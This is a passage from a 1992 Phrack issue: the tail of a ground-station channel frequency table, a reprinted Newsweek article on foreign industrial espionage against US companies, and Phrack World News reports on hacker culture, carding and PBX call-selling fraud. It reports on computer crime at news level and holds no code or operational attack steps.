C-13 895.0775 895.2775 895.4775 895.6775 895.8775
|
|
C-14 895.0835 895.2835 895.4835 895.6835 895.8835
|
|
C-15 895.0895 895.2895 895.4895 895.6895 895.8895
|
|
C-16 895.0955 895.2855 895.4955 895.6955 895.8955
|
|
C-17 895.1015 895.3015 895.5015 895.7015 895.9015
|
|
C-18 895.1075 895.3075 895.5075 895.7075 895.9075
|
|
C-19 895.1135 895.3135 895.5135 895.7135 895.9135
|
|
C-20 895.1195 895.3195 895.5195 895.7195 895.9195
|
|
C-21 895.1255 895.3255 895.5255 895.7255 895.9255
|
|
C-22 895.1315 895.3315 895.5315 895.7315 895.9315
|
|
C-23 895.1375 895.3375 895.5375 895.7375 895.9375
|
|
C-24 895.1435 895.3435 895.5435 895.7435 895.9435
|
|
C-25 895.1495 895.3495 895.5495 895.7495 895.9495
|
|
C-26 895.1555 895.3555 895.5555 895.7555 895.9555
|
|
C-27 895.1615 895.3615 895.5615 895.7615 895.9615
|
|
C-28 895.1675 895.3675 895.5675 895.7675 895.9675
|
|
C-29 895.1735 895.3735 895.5735 895.7735 895.9735
|
|
GB 895.1765 895.3765 895.5765 895.7765 895.9765
|
|
to to to to to
|
|
895.1797 895.3797 895.5797 895.7797 895.9797
|
|
P-6 895.1813 895.3813 895.5813 895.7813 895.9813
|
|
P-5 895.1845 895.3845 895.5845 895.7845 895.9845
|
|
P-4 895.1877 895.3877 895.5877 895.7877 895.9877
|
|
P-3 895.1909 895.3909 895.5909 895.7909 895.9909
|
|
P-2 895.1941 895.3941 895.5941 895.7941 895.9941
|
|
P-1 895.1973 895.3973 895.5973 895.7973 895.9973
|
|
|
|
|
|
GEOGRAPHICAL CHANNEL BLOCK LAYOUT
|
|
|
|
(Ground stations using the same channel block must be at least 300 miles apart)
|
|
|
|
LOCATION CH. BLOCK
|
|
ALASKA
|
|
Anchorage 8
|
|
Cordova 5
|
|
Ketchikan 5
|
|
Juneau 4
|
|
Sitka 7
|
|
Yakutat 8
|
|
ALABAMA
|
|
Birmingham 2
|
|
ARIZONA
|
|
Phoenix 4
|
|
Winslow 6
|
|
ARKANSAS
|
|
Pine Bluff 8
|
|
CALIFORNIA
|
|
Blythe 10
|
|
Eureka 8
|
|
Los Angeles 4
|
|
Oakland 1
|
|
S. San Fran. 6
|
|
Visalia 7
|
|
COLORADO
|
|
Colorado Spgs. 8
|
|
Denver 1
|
|
Hayden 6
|
|
FLORIDA
|
|
Miami 4
|
|
Orlando 2
|
|
Tallahassee 7
|
|
GEORGIA
|
|
Atlanta 5
|
|
St. Simons Is. 6
|
|
HAWAII
|
|
Mauna Kapu 5
|
|
IDAHO
|
|
Blackfoot 8
|
|
Caldwell 10
|
|
ILLINOIS
|
|
Chicago 3
|
|
Kewanee 5
|
|
Schiller Park 2
|
|
INDIANA
|
|
Fort Wayne 7
|
|
IOWA
|
|
Des Moines 1
|
|
KANSAS
|
|
Garden City 3
|
|
Wichita 7
|
|
KENTUCKY
|
|
Fairdale 6
|
|
LOUISIANA
|
|
Kenner 3
|
|
Shreveport 5
|
|
MASSACHUSETTS
|
|
Boston 7
|
|
MICHIGAN
|
|
Bellville 8
|
|
Flint 9
|
|
Sault S. Marie 6
|
|
MINNESOTA
|
|
Bloomington 9
|
|
MISSISSIPPI
|
|
Meridian 9
|
|
MISSOURI
|
|
Kansas City 6
|
|
St. Louis 4
|
|
Springfield 9
|
|
MONTANA
|
|
Lewistown 5
|
|
Miles City 8
|
|
Missoula 3
|
|
NEBRASKA
|
|
Grand Island 2
|
|
Ogallala 4
|
|
NEVADA
|
|
Las Vegas 1
|
|
Reno 3
|
|
Tonopah 9
|
|
Winnemucca 4
|
|
NEW MEXICO
|
|
Alamogordo 8
|
|
Albuquerque 10
|
|
Aztec 9
|
|
Clayton 5
|
|
NEW JERSEY
|
|
Woodbury 3
|
|
NEW YORK
|
|
E. Elmhurst 1
|
|
Schuyler 2
|
|
Staten Island 9
|
|
NORTH CAROLINA
|
|
Greensboro 9
|
|
Wilmington 3
|
|
NORTH DAKOTA
|
|
Dickinson 7
|
|
OHIO
|
|
Pataskala 1
|
|
OKLAHOMA
|
|
Warner 4
|
|
Woodward 9
|
|
OREGON
|
|
Albany 5
|
|
Klamath Falls 2
|
|
Pendleton 7
|
|
PENNSYLVANIA
|
|
Coraopolis 4
|
|
New Cumberland 8
|
|
SOUTH CAROLINA
|
|
Charleston 4
|
|
SOUTH DAKOTA
|
|
Aberdeen 6
|
|
Rapid City 5
|
|
TENNESSEE
|
|
Elizabethton 7
|
|
Memphis 10
|
|
Nashville 3
|
|
TEXAS
|
|
Austin 2
|
|
Bedford 1
|
|
Houston 9
|
|
Lubbock 7
|
|
Monahans 6
|
|
UTAH
|
|
Abajo Peak 7
|
|
Delta 2
|
|
Escalante 5
|
|
Green River 3
|
|
Salt Lake City 1
|
|
VIRGINIA
|
|
Arlington 6
|
|
WASHINGTON
|
|
Seattle 4
|
|
Cheney 1
|
|
WEST VIRGINIA
|
|
Charleston 2
|
|
WISCONSIN
|
|
Stevens Point 8
|
|
WYOMING
|
|
Riverton 9
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 9 of 13
|
|
|
|
THE OPEN BARN DOOR
|
|
|
|
U.S. Firms Face A Wave Of Foreign Espionage
|
|
|
|
By Douglas Waller
|
|
Newsweek, May 4, 1992, Page 58
|
|
|
|
|
|
It's tough enough these days for American companies to compete with their
|
|
Pacific Rim rivals, even when the playing field is level. It's a lot tougher
|
|
when your trade secrets are peddled by competitors. One Dallas computer
|
|
maker, for example, recently spotted its sensitive pricing information in the
|
|
bids of a South Korean rival. The firm hired a detective agency, Phoenix
|
|
Investigations, which found an innocent-looking plastic box in a closet at its
|
|
headquarters. Inside was a radio transmitter wired to a cable connected to a
|
|
company fax machine. The bug had been secretly installed by a new worker -- a
|
|
mole planted by the Korean company. "American companies don't believe this
|
|
kind of stuff can happen," says Phoenix president Richard Aznaran. "By the
|
|
time they come to us the barn door is wide open."
|
|
|
|
Welcome to a world order where profits have replaced missiles as the
|
|
currency of power. Industrial espionage isn't new, and it isn't always
|
|
illegal, but as firms develop global reach, they are acquiring new
|
|
vulnerability to economic espionage. In a survey by the American Society for
|
|
Industrial Security last year, 37 percent of the 165 U.S. firms responding said
|
|
they had been targets of spying. The increase has been so alarming that both
|
|
the CIA and the FBI have beefed up their economic counterintelligence programs.
|
|
The companies are mounting more aggressive safeguards, too. Kellog Company has
|
|
halted public tours at its Battle Creek, Michigan, facility because spies were
|
|
slipping in to photograph equipment. Eastman Kodak Company classifies
|
|
documents, just like the government. Lotus Development Corporation screens
|
|
cleaning crews that work at night. "As our computers become smaller, it's
|
|
easier for someone to walk off with one," says Lotus spokesperson Rebecca Seel.
|
|
|
|
To be sure, some U.S. firms have been guilty of espionage themselves --
|
|
though they tend not to practice it overseas, because foreign companies have a
|
|
tighter hold on their secrets. And American companies now face an additional
|
|
hazard: The professional spy services of foreign nations. "We're finding
|
|
intelligence organizations from countries we've never looked at before who are
|
|
active in the U.S.," says the FBI's R. Patrick Watson. Foreign intelligence
|
|
agencies traditionally thought friendly to the United States "are trying to
|
|
plant moles in American high-tech companies [and] search the briefcases of
|
|
American business men traveling overseas," warns CIA Director Robert Gates.
|
|
Adds Noell Matchett, a former National Security Agency official: "What we've
|
|
got is this big black hole of espionage going on all over the world and a naive
|
|
set of American business people being raped."
|
|
|
|
No one knows quite how much money U.S. businesses lost to this black hole.
|
|
Foreign governments refuse to comment on business intelligence they collect.
|
|
The victims rarely publicize the espionage or report it to authorities for fear
|
|
of exposing vulnerabilities to stockholders. But more than 30 companies and
|
|
security experts NEWSWEEK contacted claimed billions of dollars are lost
|
|
annually from stolen trade secrets and technology. This week a House Judiciary
|
|
subcommittee is holding hearings to assess the damage. IBM, which has been
|
|
targeted by French and Japanese intelligence operations, estimates $1 billion
|
|
lost from economic espionage and software piracy. IBM won't offer specifics,
|
|
but says that the espionage "runs the gamut from items missing off loading
|
|
docks to people looking over other people's shoulders in airplanes."
|
|
|
|
Most brazen: France's intelligence service, the Direction Generale de la
|
|
Securite Exterieure (DGSE), has been the most brazen about economic espionage,
|
|
bugging seats of businessmen flying on airliners and ransacking their hotel
|
|
rooms for documents, say intelligence sources. Three years ago the FBI
|
|
delivered private protests to Paris after it discovered DGSE agents trying to
|
|
infiltrate European branch offices of IBM and Texas Instruments to pass secrets
|
|
to a French competitor. The complaint fell on deaf ears. The French
|
|
intelligence budget was increased 9 percent this year, to enable the hiring of
|
|
1,000 new employees. A secret CIA report recently warned of French agents
|
|
roaming the United States looking for business secrets. Intelligence sources
|
|
say the French Embassy in Washington has helped French engineers spy on the
|
|
stealth technology used by American warplane manufacturers. "American
|
|
businessmen who stay in Paris hotels should still assume that the contents of
|
|
their briefcases will be photocopied," says security consultant Paul Joyal.
|
|
DGSE officials won't comment.
|
|
|
|
The French are hardly alone in business spying. NSA officials suspect
|
|
British intelligence of monitoring the overseas phone calls of American firms.
|
|
Investigators who just broke up a kidnap ring run by former Argentine
|
|
intelligence and police officials suspect the ring planted some 500 wiretaps on
|
|
foreign businesses in Buenos Aires and fed the information to local firms. The
|
|
Ackerman Group Inc., a Miami consulting firm that tracks espionage, recently
|
|
warned clients about Egyptian intelligence agents who break into the hotel
|
|
rooms of visiting execs with "distressing frequency."
|
|
|
|
How do the spies do it? Bugs and bribes are popular tools. During a
|
|
security review of a U.S. manufacturer in Hong Kong, consultant Richard
|
|
Hefferman discovered that someone had tampered with the firm's phone-switching
|
|
equipment in a closet. He suspects that agents posing as maintenance men
|
|
sneaked into the closet and reprogrammed the computer routing phone calls so
|
|
someone outside the building -- Heffernan never determined who -- could listen
|
|
in simply by punching access codes into his phone. Another example: After
|
|
being outbid at the last minute by a Japanese competitor, a Midwestern heavy
|
|
manufacturer hired Parvus Company, a Maryland security firm made up mostly of
|
|
former CIA and NSA operatives. Parvus investigators found that the Japanese
|
|
firm had recruited one of the manufacturer's midlevel managers with a drug
|
|
habit to pass along confidential bidding information.
|
|
|
|
Actually, many foreign intelligence operations are legal. "The science
|
|
and technology in this country is theirs for the taking so they don't even have
|
|
to steal it," says Michael Sekora of Technology Strategic Planning, Inc. Take
|
|
company newsletters, which are a good source of quota data. With such
|
|
information in hand, a top agent can piece together production rates.
|
|
American universities are wide open, too: Japanese engineers posing as students
|
|
feed back to their home offices information on school research projects.
|
|
"Watch a Japanese tour team coming through a plant or convention," says Robert
|
|
Burke with Monsanto Company. "They video everything and pick up every sheet of
|
|
paper."
|
|
|
|
Computer power: In the old days a business spy visited a bar near a plant
|
|
to find loose-lipped employees. Now all he needs is a computer, modem and
|
|
phone. There are some 10,000 computer bulletin boards in the United States --
|
|
informal electronic networks that hackers, engineers, scientists and
|
|
government bureaucrats set up with their PCs to share business gossip, the
|
|
latest research on aircraft engines, even private White House phone numbers.
|
|
|
|
An agent compiles a list of key words for the technology he wants, which
|
|
trigger responses from bulletin boards. Then, posing as a student wanting
|
|
information, he dials from his computer the bulletin boards in a city where
|
|
the business is located and "finds a Ph.D. who wants to show off," says Thomas
|
|
Sobczak of Application Configured Computers, Inc. Sobczak once discovered a
|
|
European agent using a fake name who posed questions about submarine engines to
|
|
a bulletin board near Groton, Connecticut. The same questions, asked under a
|
|
different hacker's name, appeared on bulletin boards in Charleston, South
|
|
Carolina, and Bremerton, Washington. Navy submarines are built or based at all
|
|
three cities.
|
|
|
|
Using information from phone intercepts, the NSA occasionally tips off
|
|
U.S. firms hit by foreign spying. In fact, Director Gates has promised he'll
|
|
do more to protect firms from agents abroad by warning them of hostile
|
|
penetrations. The FBI has expanded its economic counterintelligence program.
|
|
The State Department also has begun a pilot program with 50 Fortune 500
|
|
companies to allow their execs traveling abroad to carry the same portable
|
|
secure phones that U.S. officials use.
|
|
|
|
But U.S. agencies are still groping for a way to join the business spy
|
|
war. The FBI doesn't want companies to have top-of-the-line encryption devices
|
|
for fear the bureau won't be able to break their codes to tap phone calls in
|
|
criminal investigations. And the CIA is moving cautiously because many of the
|
|
foreign intelligence services "against whom you're going to need the most
|
|
protection tend to be its closest friends," says former CIA official George
|
|
Carver. Even American firms are leery of becoming too cozy with their
|
|
government's agents. But with more foreign spies coming in for the cash,
|
|
American companies must do more to protect their secrets.
|
|
|
|
How the Spies Do It
|
|
|
|
MONEY TALKS
|
|
|
|
Corporate predators haven't exactly been shy about greasing a few palms.
|
|
In some cases they glean information simply by bribing American employees. In
|
|
others, they lure workers on the pretense of hiring them for an important job,
|
|
only to spend the interview pumping them for information. If all else fails,
|
|
the spies simply hire the employees away to get at their secrets, and chalk it
|
|
all up to the cost of doing business.
|
|
|
|
STOP, LOOK, LISTEN
|
|
|
|
A wealth of intelligence is hidden in plain sight -- right inside public
|
|
records such as stockholder reports, newsletters, zoning applications and
|
|
regulatory filings. Eavesdropping helps, too. Agents can listen to execs'
|
|
airplane conversations from six seats away. Some sponsor conferences and
|
|
invite engineers to present papers. Japanese businessmen are famous for
|
|
vacuuming up handouts at conventions and snapping photos on plant tours.
|
|
|
|
BUGS
|
|
|
|
Electronic transmitters concealed inside ballpoint pens, pocket
|
|
calculators and even wall paneling can broadcast conversations in sensitive
|
|
meetings. Spies can have American firms' phone calls rerouted from the
|
|
switching stations to agents listening in. Sometimes, they tap cables attached
|
|
to fax machines.
|
|
|
|
HEARTBREAK HOTEL
|
|
|
|
Planning to leave your briefcase back at the hotel? The spooks will love
|
|
you. One of their ploys is to sneak into an room, copy documents and pilfer
|
|
computer disks. Left your password sitting around? Now they have entry to
|
|
your company's entire computer system.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 10 of 13
|
|
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
PWN PWN
|
|
PWN Phrack World News PWN
|
|
PWN PWN
|
|
PWN Issue XXXIX / Part One of Four PWN
|
|
PWN PWN
|
|
PWN Compiled by Datastream Cowboy PWN
|
|
PWN PWN
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
|
|
|
|
To Some Hackers, Right And Wrong Don't Compute May 11, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Bruce V. Bigelow (San Diego Union-Tribune)
|
|
Special Thanks to Ripper of HALE
|
|
|
|
The telephone call was anonymous, and the young, male voice was chatty and
|
|
nonchalant. He wanted to explain a few things about hacking, the black art of
|
|
tapping into private computers.
|
|
|
|
He was one of several hackers to call, both frightened and intrigued by a San
|
|
Diego police investigation into an informal network of computer criminals using
|
|
high-tech methods to make fraudulent credit-card purchases. Detectives have
|
|
seized a personal computer and other materials, and arrests are pending in San
|
|
Diego and other parts of the country.
|
|
|
|
"Half the time, it's feeding on people's stupidity," the anonymous hacker
|
|
said, boasting that most computers can be cracked as easily as popping a beer.
|
|
|
|
Hackers seem full of such bravado. In their electronic messages and in
|
|
interviews, they exaggerate and swagger.
|
|
|
|
One message traveling the clandestine network notes: "This text file contains
|
|
extremely damaging material about the American Express account making
|
|
algorithm. I do not commit credit card fraud. I just made up this scheme
|
|
because I was bored.
|
|
|
|
They form groups with names like "Legion of Doom" and "Masters of Deception,"
|
|
and give themselves nicknames like Phiber Optik, Video Vindicator and Outlaw.
|
|
They view themselves as members of a computer underground, rife with cat-and-
|
|
mouse intrigue.
|
|
|
|
For the most part, they are bring teenagers who are coming of age in a
|
|
computer-crazy world. Perhaps a generation ago, they tested their anti-
|
|
authoritarian moxie by shoplifting or stripping cars. But, as it has with
|
|
just about everything else, the computer has made teenage rebellion easier.
|
|
|
|
Nowadays, a teenager tapping on a keyboard in the comfort of his bedroom can
|
|
trespass on faraway corporate computers, explore credit files and surf coast-
|
|
to-coast on long-distance telephone lines.
|
|
|
|
San Diego police say that gathering details from computerized files as credit-
|
|
reporting agencies, hackers around the country have racked up millions of
|
|
dollars in fraudulent charges -- a trick known as "carding."
|
|
|
|
Conventual notions of right and wrong seem to go fuzzy in the ethereal realm
|
|
that hackers call cyberspace, and authorities say the number of crimes
|
|
committed by computer is exploding nationwide.
|
|
|
|
Like many hackers, the callers says he's paranoid. He won't give his name and
|
|
refuses to meed in person. Now a college student in San Diego, he says, he
|
|
began hacking when he was 13, collecting data by computer like a pack rat.
|
|
|
|
"I wanted to know how to make a bomb," he said with a laugh.
|
|
|
|
Like other hackers, he believes their strange underground community is
|
|
misunderstood and maligned. Small wonder.
|
|
|
|
They speak a specialized jargon of colons, slashes and equal signs. They work
|
|
compulsively -- sometimes obsessively -- to decipher and decode, the hacker
|
|
equivalent of breaking and entering. They exploit loopholes and flaws so they
|
|
can flaunt their techno-prowess.
|
|
|
|
"The basis of worth is what you know," the hacker says. "You'll hear the term
|
|
'lame' slung around a lot, especially if someone can't do too much."
|
|
|
|
They exchange credit-card numbers by electronic mail and on digital bulletin
|
|
boards set up on personal computers. They trade computer access codes,
|
|
passwords, hacking techniques and other information.
|
|
|
|
But it's not as if everyone is a criminal, the anonymous hacker says. What
|
|
most people don't realize, he say, is how much information is out there --
|
|
"and some people want things for free, you know?"
|
|
|
|
The real question for a hacker, he says, is what you do with the information
|
|
once you've got it. For some, restraint is a foreign concept.
|
|
|
|
RICH IN LORE
|
|
|
|
Barely 20 years old, the history of hacking already is rich in lore.
|
|
|
|
For example, John Draper gained notoriety by accessing AT&T long distance
|
|
telephone lines for free by blowing a toy whistle from a bod of Cap'n Crunch
|
|
cereal into the telephone.
|
|
|
|
Draper, who adopted "Captain Crunch" as his hacker nickname, improved on the
|
|
whistle with an electronic device that duplicated the flute like, rapid-fire
|
|
pulses of telephone tones.
|
|
|
|
Another living legend among hackers is a New York youth known as "Phiber
|
|
Optik."
|
|
|
|
"The guy has got a photographic memory,' said Craig Neidorf of Washington, who
|
|
co-founded an underground hacker magazine called Phrack. "He knows everything.
|
|
He can get into anything."
|
|
|
|
Phiber Optik demonstrated his skills during a conference organized by Harper's
|
|
Magazine, which invited some of the nation's best hackers to "log on" and
|
|
discuss hacking in an electronic forum. Harper's published a transcript of the
|
|
11-day discussion in it's March 1990 issue.
|
|
|
|
One of the participants, computer expert John Perry Barlow, insulted Phiber
|
|
Optik by saying some hackers are distinguished less by their intelligence than
|
|
by their alienation.
|
|
|
|
"Trade their modems for skateboards and only a slight conceptual shift would
|
|
occur," Barlow tapped out in his message.
|
|
|
|
Phiber Optik replied 13 minutes later by transmitting a copy of Barlow's
|
|
personal credit history, which Harper's editors noted apparently was obtained
|
|
by hacking into TRW's computer records.
|
|
|
|
For people like Emmanuel Goldstein, true hacking is like a high-tech game of
|
|
chess. The game is in the mind, but the moves are played out across a vast
|
|
electronic frontier.
|
|
|
|
"You're not going to stop hackers from trying to find out things," said
|
|
Goldstein, who publishes 2600 Magazine, the hacker quarterly, in Middle
|
|
Island, New York.
|
|
|
|
"We're going to be trying to read magnetic strips on cards," Goldstein said.
|
|
"We're going to try to figure out how password schemes work. That's not
|
|
going to change. What has to change is the security measures that companies
|
|
have to take."
|
|
|
|
ANGELHEADED HIPSTERS
|
|
|
|
True hackers see themselves, in the words of poet Allen Ginsberg, as
|
|
"Angelheaded hipsters burning for the ancient heavenly connection to the
|
|
starry dynamo in the machinery of night." These very words were used by Lee
|
|
Felsenstein, designer of the Osborne-1 computer and co-founder of the Homebrew
|
|
Computer Club.
|
|
|
|
But security consultants and law enforcement officials say malicious hackers
|
|
can visit havoc upon anyone with a credit card or driver's license.
|
|
|
|
"Almost none of it, I would say less than 10 percent, has anything to do with
|
|
intellectual exploration," said Gail Thackeray, a Phoenix prosecutor who has
|
|
specialized in computer crimes. "It has to do with defrauding people and
|
|
getting stuff you want without paying for it."
|
|
|
|
Such crimes have mushroomed as personal computers have become more affordable
|
|
and after the break up of AT&T made it more difficult to trace telephone calls,
|
|
Thackeray said.
|
|
|
|
Even those not motivated by financial gain show a ruthlessness to get what they
|
|
want, Thackeray said.
|
|
|
|
"They'll say the true hacker never damages the system he's messing with,"
|
|
Thackeray said, "but he's willing to risk it."
|
|
|
|
Science-fiction writer Bruce Sterling said he began getting anonymous calls
|
|
from hackers after an article he wrote about the "CyberView 91" hacker
|
|
convention was published in Details Magazine in October.
|
|
|
|
The caller's were apparently displeased with Sterling's article, which noted,
|
|
among other things, that the bustling convention stopped dead for the season's
|
|
final episode of "Star Trek: The Next Generation."
|
|
|
|
"They were giving me some lip," Sterling said. They showered him with
|
|
invective and chortled about details from Sterling's personal credit history,
|
|
which they had gleaned by computer.
|
|
|
|
They also gained access to Sterling's long distance telephone records, and
|
|
made abusive calls to many people who has spoken to Sterling.
|
|
|
|
"Most of the news stories I read simplify the problem to the point of saying
|
|
that a hacker is a hacker is a hacker," said Donn Parker, a computer security
|
|
consultant with SRI International in Menlo Park.
|
|
|
|
"In real life, what we're dealing with is a very broad spectrum of
|
|
individuals," Parker says. "It goes all the way from 14-year olds playing
|
|
pranks on their friends to hardened juvenile delinquents, career criminals and
|
|
international terrorists."
|
|
|
|
Yet true hackers have their own code of honor, Goldstein says. Computer
|
|
trespassing is OK, for example, but altering or damaging the system is wrong.
|
|
|
|
Posing as a technician to flim-flam access codes and passwords out of
|
|
unsuspecting computers users is also OK. That's called "social engineering."
|
|
|
|
"They're simply exploring with what they've got, weather it's exploring a
|
|
haunted house or tapping into a mainframe," Goldstein said.
|
|
|
|
"Once we figure things out, we share the information, and of course there are
|
|
going to be those people that abuse that information," Goldstein added.
|
|
|
|
It is extremely easy to break into credit bureau computers, Goldstein says.
|
|
But the privacy being violated belongs to individual Americans -- not credit
|
|
bureaus.
|
|
|
|
If anything, credit bureaus should be held accountable for not providing
|
|
better computer security, Goldstein argues.
|
|
_______________________________________________________________________________
|
|
|
|
Companies Fall Victim To Massive PBX Fraud April 20, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Barbara E. McMullen & John F. McMullen (Newsbytes)
|
|
|
|
NEW YORK CITY -- Appearing on the WBAI radio show "Off The Hook," New York
|
|
State Police senior investigator Donald Delaney discussed the movement of
|
|
organized crime groups into telecommunications fraud and warned the public
|
|
of the dangers of such practices as "shoulder surfing."
|
|
|
|
Delaney said that corporations are being victimized to the tune of millions of
|
|
dollars by unauthorized persons "outdialing" through their private branch
|
|
exchanges (PBXs). He traced the case of Data Products, a computer peripheral
|
|
firm, that did not even seem aware that calls could be routed from the outside
|
|
through their switchboard to foreign countries. It was only, according to
|
|
Delaney, when it received a monthly telephone bill of over $35,000 that it
|
|
perceived a problem.
|
|
|
|
"It was at 5:10 PM on a certain date that Liriano finally, after weeks of
|
|
trying, was able to obtain an outside dial tone on Data Products 800 number.
|
|
Subsequent investigation showed that thousands of calls using a 9600 baud modem
|
|
as well as manually placed calls had been made to the 800 number. At 7:30 the
|
|
same evening, a call using the Data Products number was placed to the Dominican
|
|
Republic from a telephone booth near Liriano's house. Within a few hours,
|
|
calls were placed from phones all around the neighborhood -- and, within a
|
|
week, calls began being placed from booths all around Manhattan," Delaney
|
|
related.
|
|
|
|
Phiber Optik, another studio guest and a convicted computer intruder previously
|
|
arrested by Delaney, commented, "I'm glad that Mr. Delaney didn't refer to
|
|
these people as hackers, but identified them for what they are: Sleezy common
|
|
criminals. What these people are doing requires no super computer knowledge
|
|
nor desire to learn. They are simply using computers and telephones to steal."
|
|
|
|
Delaney agreed, saying, "The people actually selling the calls, on the street
|
|
corner, in their apartments, or, in the case of cellular phones, in parked
|
|
cars, don't have to know anything about the technology. They are given the
|
|
necessary PBX numbers and codes by people higher up in the group and they just
|
|
dial the numbers and collect the money. In the case of the re-chipped or clone
|
|
cellular phones, they don't even have to dial the numbers."
|
|
|
|
Delaney added, "These operations have become very organized very rapidly. I
|
|
have arrested people that have printed revenue goals for the current month,
|
|
next six months, and entire year -- just like any other franchise operation.
|
|
I'm also currently investigating a murder of a call-seller that I arrested last
|
|
October. He was an independent trying to operate in a highly organized and
|
|
controlled section of Queens. His pursuit of an independent career may well
|
|
have been responsible for his death."
|
|
|
|
Off The Hook host Emmanuel Goldstein asked Delaney what responsibility that the
|
|
PBX companies bear for what seems to be rather easy use of their systems for
|
|
such activity. Delaney responded that he thought that the companies bear at
|
|
least an ethical and moral responsibility to their clients to insure that they
|
|
are aware of their exposure and the means that they must take to reduce the
|
|
exposure. "As far as criminal and civil responsibility for the security of the
|
|
system, there are no criminal statues that I am aware of that would hold the
|
|
PBX companies criminally liable for failure to insure proper security. On the
|
|
civil side, I think that the decision in the AT&T suit about this very topic
|
|
will shed some light of legal responsibility."
|
|
|
|
Goldstein also brought up the difficulties that some independent "customer-
|
|
owned coin-operated" telephones (COCOTs) cause for customers. "The charges are
|
|
often exorbitant, access to AT&T via 10288 is sometimes blocked, there is not
|
|
even the proper access to 911 on some systems, and some either block 800 calls
|
|
or actually try to charge for the connection to the 800 numbers.
|
|
|
|
"We've even found COCOTs that, on collect calls, put the charges through when
|
|
an answering machine picks up and the caller hangs up after realizing that no
|
|
one is home. They are set up to start billing if a human voice is heard and the
|
|
caller doesn't hang up within 5 or 10 seconds."
|
|
|
|
Delaney agreed that the COCOTS that behave in this fashion are an ongoing
|
|
problem for unsuspecting users, but said that he has received no complaints
|
|
about illegal behavior. He said, however, that he had received complaints
|
|
about fraudulent operation of 540 numbers -- the local New York equivalent of a
|
|
900 number. He said "most people don't realize that a 540 number is a
|
|
chargeable number and these people fall victim to these scams. We had one case
|
|
in which a person had his computer calling 8,000 phone numbers in the beeper
|
|
blocks each night. The computer would send a 540 number to the beepers.
|
|
People calling the number would receive some innocuous information and, at the
|
|
end of the month a $55 charge on her/his telephone bill."
|
|
|
|
Delaney continued, "The public has much to be worried about related to
|
|
telephone fraud, particularly in New York City which can be called "Fraud
|
|
Central, USA." If you go into the Port Authority Bus Terminal and look up in
|
|
the balcony, you will see rows of people "shoulder surfing" with binoculars.
|
|
They have binoculars or telescopes trained on the public telephones. When they
|
|
see a person making a credit card call, they repeat the numbers into a tape
|
|
recorder. The number is then sold and, within a few days, it is in use all
|
|
around the city. People should always be aware of the possibility of shoulder
|
|
surfers in the area."
|
|
|
|
Goldstein returned to the 540 subject, pointing out that "because so many
|
|
people don't realize that it is a billable number, they get caught by ads and
|
|
wind up paying for scam calls. We published a picture in 2600 Magazine of a
|
|
poster seen around New York, advertising apartment rental help by calling a
|
|
540 number. In very tiny print, almost unreadable, it mentions a charge.
|
|
People have to be very careful about things like this."
|
|
|
|
Delaney agreed, saying, "The 540 service must say within the first 10 seconds
|
|
that there is a charge, how much it is, and that the person can hang up now
|
|
without being charged -- the guy with the beeper scam didn't do that and that
|
|
was one of the reasons for his arrest. Many of the services give the charge so
|
|
fast and mix it in with instructions to stay on for a free camera or another
|
|
number to find out about the vacation that they have won that they miss the
|
|
charges and wind up paying. The 540 person has, although he may be trying to
|
|
defraud, complied with the letter of the law and it might be difficult to
|
|
prosecute him. The average citizen must therefore be more aware of these scams
|
|
and protect themselves."
|
|
|
|
Goldstein, Phiber Optik, and Delaney spent the remainder of the show answering
|
|
listener questions. Off The Hook is heard every Wednesday evening on New York
|
|
City's WBAI (99.5 FM). Recent guests have included Mike Godwin, in-house
|
|
counsel of the Electronic Frontier Foundation; and Steve Jackson, CEO of Steve
|
|
Jackson Games.
|
|
_______________________________________________________________________________
|
|
|
|
Changing Aspects Of Computer Crime Discussed At NYACC May 15, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Barbara E. McMullen (Newbytes)
|
|
|
|
New York City -- Donald Delaney, New York State Police senior investigator, and
|
|
Mike Godwin, in-house counsel, Electronic Frontier Foundation (EFF), speaking
|
|
to the May meeting of the New York Amateur Computer Club (NYACC), agreed that
|
|
the entrance of organized crime into telecommunications fraud has made the
|
|
subject of computer crime far different than that discussed just a year ago at
|
|
a similar meeting.
|
|
|
|
Newsbytes New York bureau chief John McMullen, moderating the discussion,
|
|
recalled that Delaney in last year's appearance had called for greater
|
|
education of law enforcement officers in technological areas, the establishment
|
|
of a New York State computer crime lab, outreach by law enforcement agencies to
|
|
the public to heighten awareness of computer crime and the penalties attached
|
|
-- items that have all come to pass in the ensuing 12 months. He also
|
|
mentioned that issues involving PBX & cellular phone fraud, privacy concerns
|
|
and ongoing debate over law enforcement wiretapping & decryption capabilities
|
|
have replaced the issues that received most of the attention at last year's
|
|
meeting.
|
|
|
|
Delaney agreed with McMullen, saying that there has been major strides made in
|
|
the education of law enforcement personnel and in the acquisition of important
|
|
tools to fight computer crime. He said that the practice of "carding" -- the
|
|
purchasing of goods, particularly computer equipment, has become a much more
|
|
major problem than it was a year ago and that many more complaints of such
|
|
activities are now received.
|
|
|
|
He added that "call-selling" operations, the making of international telephone
|
|
calls to foreign countries for a fee, through the fraudulent use of either a
|
|
company's private branch exchange (PBX) or an innocent party's cellular phone
|
|
account, has become so lucrative that arrested suspects have told him that
|
|
"they are moving from drug sales to this type of crime because it is less
|
|
dangerous and more rewarding."
|
|
|
|
Delaney pointed out, however, that one of his 1991 arrests had recently been
|
|
murdered, perhaps for trying to operate as an independent in an area that now
|
|
seems to be under the control of a Columbian mob "so maybe it's not going to
|
|
continue to be less dangerous."
|
|
|
|
Delaney also said that PBX fraud will continue to be a problem until the
|
|
companies using PBX systems fully understand the system capabilities and take
|
|
all possible steps to insure security. "Many firms don't even know that their
|
|
systems have out-dialing capabilities until they get it with additional monthly
|
|
phone charges of upwards of $35,000. They don't realize that the system has
|
|
default passwords that are supposed to be changed," he said, "It finally hits
|
|
some small businesses when they are bankrupted by the fraudulent long-distance
